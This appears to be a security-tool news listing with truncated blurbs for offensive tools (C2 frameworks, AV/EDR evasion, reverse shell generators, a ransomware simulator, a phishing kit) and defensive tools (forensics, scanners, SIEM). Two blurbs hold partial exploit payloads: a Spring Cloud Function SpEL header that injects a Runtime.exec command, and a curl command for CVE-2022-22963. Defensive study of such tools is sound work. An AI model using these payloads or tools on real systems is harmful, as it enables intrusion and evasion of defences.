Uncover - Quickly Discover Exposed Hosts On The Internet Using Multiple Search Engine

uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools. Currently, it supports shodan , censys , and fofa search engine...

Cloak - A Censorship Circumvention Tool To Evade Detection By Authoritarian State Adversaries

Cloak is a pluggable transport that enhances traditional proxy tools like OpenVPN to evade sophisticated censorship and data discrimination. Cloak is not a standalone proxy program. Rather, it works by masquerading proxied traffic as normal web browsing activities. In contrast to traditional tool...

OffensiveNotion - Notion As A Platform For Offensive Operations

Notion yes, the notetaking app as a C2. Wait, What? Yes. But Why? What started as a meme grew into a full project. Just roll with it. Read more! Here's our blog post about it: We Put A C2 In Your Notetaking App: OffensiveNotion Features A full-featured C2 platform built on the Notion notetaking...

Octosuite - Advanced Github OSINT Framework

Simply gatherOSINT on Github users and organizations like a god  FEATURES Fetches organization info Fetches user info Fetches repository info Returns contents of a path from a repository Returns a list of repos owned by an organization Returns a list of repos owned by a user Returns a list of...

Gitbleed_Tools - For Extracting Data From Mirrorred Git Repositories

This repo contains shell scripts that can be used to download and analyze differences between cloned and mirror Git repositories. For more information about the underlying quirk in Git behavior, please visit read our blog post. What Do These Scripts Do? These scripts will clone a copy of the give...

Hcltm - Documenting Your Threat Models With HCL

Threat Modeling with HCL Overview There are many different ways in which a threat model can be documented. From a simple text file, to more in-depth word documents, to fully instrumented threat models in a centralised solution. Two of the most valuable attributes of a threat model are being able ...

KNX-Bus-Dump - A Tool To Listen On A KNX Bus Via TPUART And The Calimero Project Suite And To Dump The Data From The Packets Into A Wireshark-Compatible File Hex Dump

KNX is a popular building automation protocol and is used to interconnect sensors, actuators and other components of a smart building together. Our KNX Bus Dump tool uses the Calimero java library, which we contributed to for the sake of this tool, to record the telegrams sent over a KNX bus...

ScheduleRunner - A C# Tool With More Flexibility To Customize Scheduled Task For Both Persistence And Lateral Movement In Red Team Operation

Scheduled task is one of the most popular attack technique in the past decade and now it is still commonly used by hackers/red teamers for persistence and lateral movement. A number of C tools were already developed to simulate the attack using scheduled task. I have been playing around with some...

DarthSidious - Building An Active Directory Domain And Hacking It

The goal is simple To share my modest knowledge about hacking Windows systems. This is commonly refered to as red team exercises. This book however, is also very concerned with the blue team; the defenders. That is, helping those who are working as defenders, analysts and security experts to buil...

ICMP-TransferTools - Transfer Files To And From A Windows Host Via ICMP In Restricted Network Environments

ICMP-TransferTools is a set of scripts designed to move files to and from Windows hosts in restricted network environments. This is accomplished using a total of 4 different files, consisting of a python server and powershell client for each transfer direction Download & Upload. The only dependen...

Live-Forensicator - Powershell Script To Aid Incidence Response And Live Forensics

Live Forensicator is part of the Black Widow Toolbox, its aim is to assist Forensic Investigators and Incidence responders in carrying out a quick live forensic investigation. It achieves this by gathering different system information for further review for anomalous behaviour or unexpected data...

Phantun - Transforms UDP Stream Into (Fake) TCP Streams That Can Go Through Layer 3 &Amp; Layer 4 (NAPT) firewalls/NATs

Phantun is a project that obfuscated UDP packets into TCP connections. It aims to achieve maximum performance with minimum processing and encapsulation overhead. It is commonly used in environments where UDP is blocked/throttled but TCP is allowed through. Phantun simply converts a stream of UDP...

CobaltBus - Cobalt Strike External C2 Integration With Azure Servicebus, C2 Traffic Via Azure Servicebus

Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus Setup 1. Create an Azure Service Bus 2. Create a Shared access policy Connection string that can only Send and Listen 3. Edit the static connectionString variable in Beacon C projects to match the "Primar...

Odin - Central IoC Scanner Based On Loki

Odin is a central IoC scanner based on Loki General Info This application Loki latest version and download it on all machines using a powershell script and run it then this app receives the respose from all machines and parse the feed in CSV form. Requirements 1. Python +3.5 2. PyQT5 3. psutil 4...

Subdomains.Sh - A Wrapper Around Tools I Use For Subdomain Enumeration On A Given Domain. This Script Is Written With The Aim To Automate The Workflow

subdomains.sh wrapper around tools I use for subdomain enumeration, to automate the workflow, on a given domain. Usage To display this script's help message, use the -h flag: subdomains.sh -h subdomains for --use-passive-source comma, separated tools to use --exclude-passive-source comma, separat...

Auto-Elevate - Escalate From A Low-Integrity Administrator Account To NT AUTHORITY\SYSTEM Without An LPE Exploit By Combining A COM UAC Bypass And Token Impersonation

This tool demonstrates the power of UAC bypasses and built-in features of Windows. This utility auto-locates winlogon.exe, steals and impersonates it's process TOKEN, and spawns a new SYSTEM-level process with the stolen token. Combined with UAC bypass method 41 ICMLuaUtil UAC bypass from...

Slyther - AWS Security Tool

Slyther is AWS Security tool to check read/write/delete access for S3 buckets Requirements aws-cli Installation pip3 install -r requirements.txt Usage example python3 slyther.py -b flaws.cloud Release History 0.0.3 Added option to check if aws-cli is installed or not 0.0.2 Added option to check...

Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP

spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header spring.cloud.function.routing-expression:Tjava.lang.Runtime.getRuntime.exec"open -a calculator.app" build wget...

CVE-2022-22963 - PoC Spring Java Framework 0-day Remote Code Execution Vulnerability

To run the vulnerable SpringBoot application run this docker container exposing it to port 8080. Example: docker run -it -d -p 8080:8080 bobcheat/springboot-public Exploit Curl command: curl -i -s -k -X $'POST' -H $'Host: 192.168.1.2:8080' -H...

CVE-2022-27254 - PoC For Vulnerability In Honda's Remote Keyless System

PoC for vulnerability in Honda's Remote Keyless SystemCVE-2022-27254 Disclaimer: For educational purposes only. Kindly note that the discoverers for this vulnerability are Ayyappan Rajesh, a student at UMass Dartmouth and HackingIntoYourHeart. Others mentioned in this repository are credited for...

Casper-Fs - A Custom Hidden Linux Kernel Module Generator. Each Module Works In The File System To Protect And Hide Secret Files

Casper-fs is a custom Linux Kernel Module generator to work with resources to protect or hide a custom list of files. Each LKM has resources to protect or hide files following a custom list in the YAML rule file. Yes, not even the root has permission to see the files or make actions like edit and...

LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly

A low-dependency command-line tool for generating reverse shell payloads on the fly. Description LAZYPARIAH is a simple and easily installable command-line tool written in pure Ruby that can be used during penetration tests and capture-the-flag CTF competitions to generate a range of reverse shel...

Socid-Extractor - Extract Accounts Info From Personal Pages On Various Sites For OSINT Purpose

Extract information about a user from profile webpages / API responses and save it in machine-readable format. Usage As a command-line tool: $ socidextractor --url https://www.deviantart.com/muse1908 country: France createdat: 2005-06-16 18:17:41 gender: female username: Muse1908 website:...

Fennec - Artifact Collection Tool For *Nix Systems

fennec is an artifact collection tool written in Rust to be used during incident response on nix based systems. fennec allows you to write a configuration file that contains how to collect artifacts. Features A single statically compiled binary Execute any osquery SQL query Execute system command...

Gitcolombo - Extract And Analyze Contributors Info From Git Repos

OSINT tool to extract info about persons from git repositories: common names, emails, matches between different as it may seems accounts. Using 1. Install git 2. Run: repos by nickname ./gitcolombo.py --nickname LubyRuffy" from any git url ./gitcolombo.py -u...

Ostorlab - A Security Scanning Platform That Enables Running Complex Security Scanning Tasks Involving Multiple Tools In An Easy, Scalable And Distributed Way

The Sales Pitch If this is the first time you are visiting the Ostorlab Github page, here is the sales pitch. Security testing requires often chaining tools together, taking the output from one, mangling it, filtering it and then pushing it to another tool. Several tools have tried to make the...

Nimcrypt2 - .NET, PE, And Raw Shellcode Packer/Loader Written In Nim

Nimcrypt2 is yet another PE packer/loader designed to bypass AV/EDR. It is an improvement on my original Nimcrypt project, with the main improvements being the use of direct syscalls and the ability to load regular PE files as well as raw shellcode. Before going any further, I must acknowledge...

Request_Smuggler - Http Request Smuggling Vulnerability Scanner

Based on the amazing research by James Kettle. The tool can help to find servers that may be vulnerable to request smuggling vulnerability. Usage USAGE: requestsmuggler OPTIONS --url FLAGS: -h, --help Prints help information -V, --version Prints version information OPTIONS: --amount-of-payloads...

Zkar - A Java Serialization Protocol Analysis Tool Implement In Go

ZKar is a Java serialization protocol analysis tool implement in Go. This tool is still work in progress , so no complete API document and contribution guide. ZKar provides: A Java serialization payloads parser and viewer in pure Go, no CGO or JDK is required From the Java serialization protocol ...

SysWhispers3 - AV/EDR Evasion Via Direct System Calls

SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls. Why on earth didn't I create a PR to SysWhispers2? The reason for SysWhispers3 to be a standalone version are many, but the most important are: SysWhispers3 is the de-facto "fork" used by...

Factual-Rules-Generator - An Open Source Project Which Aims To Generate YARA Rules About Installed Software From A Machine

Factual-rules-generator is an open source project which aims to generate YARA rules about installed software from a running operating system. The goal of the software is to be able to use a set of rules against collected or acquired digital forensic evidences and find installed software in a time...

Tiktok-Scraper - TikTok Scraper. Download Video Posts, Collect User/Trend/Hashtag/Music Feed Metadata, Sign URL And Etc

Scrape and download useful information from TikTok. No login or password are required This is not an official API support and etc. This is just a scraper that is using TikTok Web API to scrape media and related meta information. Important notes As of right now it is NOT possible to download video...

ADExplorerSnapshot.py - An AD Explorer Snapshot Parser. It Is Made As An Ingestor For BloodHound, And Also Supports Full-Object Dumping To NDJSON

ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound, and also supports full-object dumping to NDJSON. AD Explorer allows you to connect to a DC and browse LDAP data. It can also create snapshots of the server you are currently attached to. This tool...

ShellcodeTemplate - An Easily Modifiable Shellcode Template For Windows X64/X86

An easily modifiable shellcode template for Windows x64/x86 How does it work? This template is heavily based on Austin Hudson's aka SecIdiot TitanLdr It compiles the project into a PE Executable and extracts the .text section Example The entrypoint of the shellcode looks like this. Of course, thi...

FastFinder - Incident Response - Fast Suspicious File Finder

FastFinder is a lightweight tool made for threat hunting, live forensics and triage on both Windows and Linux Platforms. It is focused on endpoint enumeration and suspicious file finding based on various criterias: file path / name md5 / sha1 / sha256 checksum simple string content match complex...

Vortex - VPN Overall Reconnaissance, Testing, Enumeration And eXploitation Toolkit

VPN Overall Reconnaissance, Testing, Enumeration and Exploitation Toolkit Overview A very simple Python framework, inspired by SprayingToolkit, that tries to automate most of the process required to detect, enumerate and attack common O365 and VPN endpoints like Cisco, Citrix, Fortinet, Pulse,...

Oh365UserFinder - Python3 O365 User Enumeration Tool

Oh365UserFinder is used for identifying valid o365 accounts and domains without the risk of account lockouts. The tool parses responses to identify the "IfExistsResult" flag is null or not, and responds appropriately if the user is valid. The tool will attempt to identify false positives based on...

PSRansom - PowerShell Ransomware Simulator With C2 Server

PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server, you can exfiltrate files and receive client informati...

S3Sec - Check AWS S3 Instances For Read/Write/Delete Access

Test AWS S3 buckets for read/write/delete access This tool was developed to quickly test a list of s3 buckets for public read, write and delete access for the purposes of penetration testing on bug bounty programs. Found a bug bounty using this tool? Feel free to add me as a collaborator: @0xmoot...

Nuclei-Burp-Plugin - Nuclei Plugin For BurpSuite

A BurpSuite plugin intended to help with nuclei template generation. Features Template matcher generation Word and Binary matcher creation using selected response snippets from Proxy history or Repeater contexts Multi-line selections are split to separate words for readability Binary matchers are...

Ghostbuster - Eliminate Dangling Elastic IPs By Performing Analysis On Your Resources Within All Your AWS Accounts

Eliminate dangling elastic IPs by performing analysis on your resources within all your AWS accounts. Ghostbuster obtains all the DNS records present in all of your AWS accounts Route53, and can optionally take in records via CSV input, or via Cloudflare. After these records are collected,...

S1EM - This Project Is A SIEM With SIRP And Threat Intel, All In One

Today, cyber attacks are more numerous and cause damage in companies. Nevertheless, many software products exist to detect cyber threats. The S1EM solution is based on the principle of bringing together the best products in their field, free of charge, and making them quickly interoperable. S1EM ...

Epagneul - Graph Visualization For Windows Event Logs

Epagneul is a tool to visualize and investigatewindows event logs. Deployment Requires docker and docker-compose to be installed. Installing make Offline deployment On a machine connected to internet, build an offline release: make release This will create a release folder containing ready to go...

Mip22 - An Advanced Phishing Tool

The program is made for educational purposes only for to see how the phishing method works. Any unnecessary use of the program is prohibited and the manufacturer has no responsibility for any illegal use by anyone. Use the tool at your own risk and avoid any sloppy actions. Installation...

PurplePanda - Identify Privilege Escalation Paths Within And Across Different Clouds

This tool fetches resources from different cloud/saas applications focusing on permissions in order to identifyprivilege escalation paths and dangerous permissions in the cloud/saas configurations. Note that PurplePanda searches both privilegesescalation paths within a platform and across...

RefleXXion - A Utility Designed To Aid In Bypassing User-Mode Hooks Utilised By AV/EPP/EDR Etc

Introduction RefleXXion is a utility designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks, it first collects the syscall numbers of the NtOpenFile, NtCreateSection, NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature arra...

WMEye - A Post Exploitation Tool That Uses WMI Event Filter And MSBuild Execution For Lateral Movement

WMEye is an experimental tool that was developed when exploring about Windows WMI. The tool is developed for performing Lateral Movement using WMI and remote MSBuild Execution. It uploads the encoded/encrypted shellcode into remote targets WMI Class Property, create an event filter that when...

Patching - An Interactive Binary Patching Plugin For IDA Pro

Patching assembly code to change the behavior of an existing program is not uncommon in malware analysis, software reverse engineering, and broader domains of security research. This project extends the popular IDA Pro disassembler to create a more robust interactive binary patching workflow...

Lnkbomb - Malicious Shortcut Generator For Collecting NTLM Hashes From Insecure File Shares

Lnkbomb is used for uploading malicious shortcut files to insecure file shares. The vulnerability exists due to Windows looking for an icon file to associate with the shortcut file. This icon file can be directed to a penetration tester's machine running Responder or smbserver to gather NTLMv1 or...

CodeAnalysis - Static Code Analysis

Tencent Cloud Code Analysis TCA for short, code-named CodeDog inside the company early is a comprehensive platform for code analysis and issue tracking. TCA consist of three components, server, web and client. It also supports the integration of other code analysis tools. Code analysis is a...